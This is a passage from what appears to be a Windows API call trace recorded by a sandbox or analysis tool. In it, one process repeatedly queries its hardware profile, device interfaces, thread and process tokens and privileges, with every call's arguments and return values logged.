CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.143] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.143] GetCurrentThread () returned 0xfffffffe [0085.143] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.143] GetLastError () returned 0x3f0 [0085.143] GetCurrentProcess () returned 0xffffffff [0085.143] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.143] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.143] SetLastError (dwErrCode=0x522) [0085.143] CloseHandle (hObject=0x114) returned 1 [0085.143] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.143] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.143] GetLastError () returned 0x578 [0085.143] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.143] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.143] GetCurrentThread () returned 0xfffffffe [0085.143] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.143] GetLastError () returned 0x3f0 [0085.143] GetCurrentProcess () returned 0xffffffff [0085.143] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.143] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.143] SetLastError (dwErrCode=0x522) [0085.143] CloseHandle (hObject=0x114) returned 1 [0085.143] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.143] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.143] GetLastError () returned 0x578 [0085.143] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.143] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.143] GetCurrentThread () returned 0xfffffffe [0085.143] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.143] GetLastError () returned 0x3f0 [0085.143] GetCurrentProcess () returned 0xffffffff [0085.143] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.143] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.143] SetLastError (dwErrCode=0x522) [0085.143] CloseHandle (hObject=0x114) returned 1 [0085.143] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.143] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.143] GetLastError () returned 0x578 [0085.143] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.143] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.144] GetCurrentThread () returned 0xfffffffe [0085.144] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.144] GetLastError () returned 0x3f0 [0085.144] GetCurrentProcess () returned 0xffffffff [0085.144] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.144] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.144] SetLastError (dwErrCode=0x522) [0085.144] CloseHandle (hObject=0x114) returned 1 [0085.144] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.144] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.144] GetLastError () returned 0x578 [0085.144] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.144] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.144] GetCurrentThread () returned 0xfffffffe [0085.144] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.144] GetLastError () returned 0x3f0 [0085.144] GetCurrentProcess () returned 0xffffffff [0085.144] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.144] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.144] SetLastError (dwErrCode=0x522) [0085.144] CloseHandle (hObject=0x114) returned 1 [0085.144] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.144] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.144] GetLastError () returned 0x578 [0085.144] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.144] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.144] GetCurrentThread () returned 0xfffffffe [0085.144] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.144] GetLastError () returned 0x3f0 [0085.144] GetCurrentProcess () returned 0xffffffff [0085.144] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.144] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.144] SetLastError (dwErrCode=0x522) [0085.144] CloseHandle (hObject=0x114) returned 1 [0085.144] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.144] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.144] GetLastError () returned 0x578 [0085.144] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.144] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.144] GetCurrentThread () returned 0xfffffffe [0085.144] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.144] GetLastError () returned 0x3f0 [0085.144] GetCurrentProcess () returned 0xffffffff [0085.144] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.144] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.144] SetLastError (dwErrCode=0x522) [0085.144] CloseHandle (hObject=0x114) returned 1 [0085.144] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.144] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.145] GetLastError () returned 0x578 [0085.145] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.145] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.145] GetCurrentThread () returned 0xfffffffe [0085.145] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.145] GetLastError () returned 0x3f0 [0085.145] GetCurrentProcess () returned 0xffffffff [0085.145] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.145] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.145] SetLastError (dwErrCode=0x522) [0085.145] CloseHandle (hObject=0x114) returned 1 [0085.145] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.145] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.145] GetLastError () returned 0x578 [0085.145] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.145] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.145] GetCurrentThread () returned 0xfffffffe [0085.145] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.145] GetLastError () returned 0x3f0 [0085.145] GetCurrentProcess () returned 0xffffffff [0085.145] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.145] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.145] SetLastError (dwErrCode=0x522) [0085.145] CloseHandle (hObject=0x114) returned 1 [0085.145] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.145] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.145] GetLastError () returned 0x578 [0085.145] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.145] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.145] GetCurrentThread () returned 0xfffffffe [0085.145] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.145] GetLastError () returned 0x3f0 [0085.145] GetCurrentProcess () returned 0xffffffff [0085.145] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.145] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.145] SetLastError (dwErrCode=0x522) [0085.145] CloseHandle (hObject=0x114) returned 1 [0085.145] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.145] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.145] GetLastError () returned 0x578 [0085.145] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.145] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.145] GetCurrentThread () returned 0xfffffffe [0085.145] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.145] GetLastError () returned 0x3f0 [0085.145] GetCurrentProcess () returned 0xffffffff [0085.145] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.145] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.146] SetLastError (dwErrCode=0x522) [0085.146] CloseHandle (hObject=0x114) returned 1 [0085.146] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.146] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.146] GetLastError () returned 0x578 [0085.146] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.146] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.146] GetCurrentThread () returned 0xfffffffe [0085.146] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.146] GetLastError () returned 0x3f0 [0085.146] GetCurrentProcess () returned 0xffffffff [0085.146] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.146] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.146] SetLastError (dwErrCode=0x522) [0085.146] CloseHandle (hObject=0x114) returned 1 [0085.146] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.146] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.146] GetLastError () returned 0x578 [0085.146] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.146] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.146] GetCurrentThread () returned 0xfffffffe [0085.146] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.146] GetLastError () returned 0x3f0 [0085.146] GetCurrentProcess () returned 0xffffffff [0085.146] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.146] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.146] SetLastError (dwErrCode=0x522) [0085.146] CloseHandle (hObject=0x114) returned 1 [0085.146] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.146] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.146] GetLastError () returned 0x578 [0085.146] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.146] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.146] GetCurrentThread () returned 0xfffffffe [0085.146] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.146] GetLastError () returned 0x3f0 [0085.146] GetCurrentProcess () returned 0xffffffff [0085.146] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.146] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.146] SetLastError (dwErrCode=0x522) [0085.146] CloseHandle (hObject=0x114) returned 1 [0085.146] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.146] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.146] GetLastError () returned 0x578 [0085.146] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.146] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.146] GetCurrentThread () returned 0xfffffffe [0085.146] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.147] GetLastError () returned 0x3f0 [0085.147] GetCurrentProcess () returned 0xffffffff [0085.147] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.147] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.147] SetLastError (dwErrCode=0x522) [0085.147] CloseHandle (hObject=0x114) returned 1 [0085.147] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.147] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.147] GetLastError () returned 0x578 [0085.147] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.147] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.147] GetCurrentThread () returned 0xfffffffe [0085.147] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.147] GetLastError () returned 0x3f0 [0085.147] GetCurrentProcess () returned 0xffffffff [0085.147] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.147] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.147] SetLastError (dwErrCode=0x522) [0085.147] CloseHandle (hObject=0x114) returned 1 [0085.147] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.147] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.147] GetLastError () returned 0x578 [0085.147] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.147] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.147] GetCurrentThread () returned 0xfffffffe [0085.147] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.147] GetLastError () returned 0x3f0 [0085.147] GetCurrentProcess () returned 0xffffffff [0085.147] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.147] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.147] SetLastError (dwErrCode=0x522) [0085.147] CloseHandle (hObject=0x114) returned 1 [0085.147] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.147] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.147] GetLastError () returned 0x578 [0085.147] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.147] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.147] GetCurrentThread () returned 0xfffffffe [0085.147] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.147] GetLastError () returned 0x3f0 [0085.147] GetCurrentProcess () returned 0xffffffff [0085.147] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.147] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.147] SetLastError (dwErrCode=0x522) [0085.147] CloseHandle (hObject=0x114) returned 1 [0085.147] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.148] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.148] GetLastError () returned 0x578 [0085.148] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.148] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.148] GetCurrentThread () returned 0xfffffffe [0085.148] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.148] GetLastError () returned 0x3f0 [0085.148] GetCurrentProcess () returned 0xffffffff [0085.148] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.148] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.148] SetLastError (dwErrCode=0x522) [0085.148] CloseHandle (hObject=0x114) returned 1 [0085.148] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.148] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.148] GetLastError () returned 0x578 [0085.148] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.148] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.148] GetCurrentThread () returned 0xfffffffe [0085.148] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.148] GetLastError () returned 0x3f0 [0085.148] GetCurrentProcess () returned 0xffffffff [0085.148] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.148] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.148] SetLastError (dwErrCode=0x522) [0085.148] CloseHandle (hObject=0x114) returned 1 [0085.148] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.148] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.148] GetLastError () returned 0x578 [0085.148] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.148] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.148] GetCurrentThread () returned 0xfffffffe [0085.148] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.148] GetLastError () returned 0x3f0 [0085.148] GetCurrentProcess () returned 0xffffffff [0085.148] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.148] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.148] SetLastError (dwErrCode=0x522) [0085.148] CloseHandle (hObject=0x114) returned 1 [0085.148] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.148] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.148] GetLastError () returned 0x578 [0085.148] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.148] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.148] GetCurrentThread () returned 0xfffffffe [0085.148] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.148] GetLastError () returned 0x3f0 [0085.148] GetCurrentProcess () returned 0xffffffff [0085.148] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.148] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.148] SetLastError (dwErrCode=0x522) [0085.148] CloseHandle (hObject=0x114) returned 1 [0085.149] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.149] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 